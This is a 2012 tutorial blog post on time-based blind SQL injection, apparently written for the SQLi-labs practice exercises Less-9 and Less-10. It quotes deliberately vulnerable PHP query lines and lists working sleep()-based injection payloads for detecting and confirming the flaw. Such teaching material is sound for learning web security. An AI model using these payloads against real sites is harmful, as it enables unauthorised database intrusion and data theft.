Sunday, June 24, 2012


CAUTION: This is for educational purposes only, please do not use the skills you gain from following the video lessons, blog to harm or test sites on the internet for whom you do not have permissions. Doing so is illegal. I do not support these sort of activities and would advice you all to stay away from the same... If you do so you are solely responsible for your actions, you have been warned.


In the previous post, we discussed the basics of Blind injections and started to explore Boolean based blind injections. In this blog post we would continue with the Blind injections and discuss TIME based injections. 
In certain web web applications, which are vulnerable but does not disclose errors, nor does the database display any fields on the web pages and neither does it react to physical boolean queries of yes and no meaning we cannot physically differentiate between true and false,
in that case, we can use time to distinguish between true and false. This can be achieved by using sleep() function. This function is non cpu intensive and if query is true will wait for some time before returning a response and respond quickly if false. This time difference in page reload gives us the correct characters one by one.
Another way to do time based injections is by use of heavy queries (benchmark queries) which are intensive and consume some CPU cycles if query returns true and are quick if it is false. It is always good to use sleep() function.

Less - 9  line number 29
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'+and+sleep(10)+--+  -- Basic injection to detect sqli
1'+and+if(1=1, sleep(10), null)+--+  -- Returns True  ( page load is approx 10 sec)
1'+and+if(1=0, sleep(10), null)+--+  -- Returns False (page load is almost instant)

Less-10 line number 28,29

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"+and+sleep(10)+--+  -- Basic injection to detect sqli
1"+and+if(1=1, sleep(10), null)+--+  -- Returns True  ( page load is approx 10 sec)
1"+and+if(1=0, sleep(10), null)+--+  -- Returns False (page load is almost instant)

Hope this makes some sense, after all I am a dhakkan.

No comments:

Post a Comment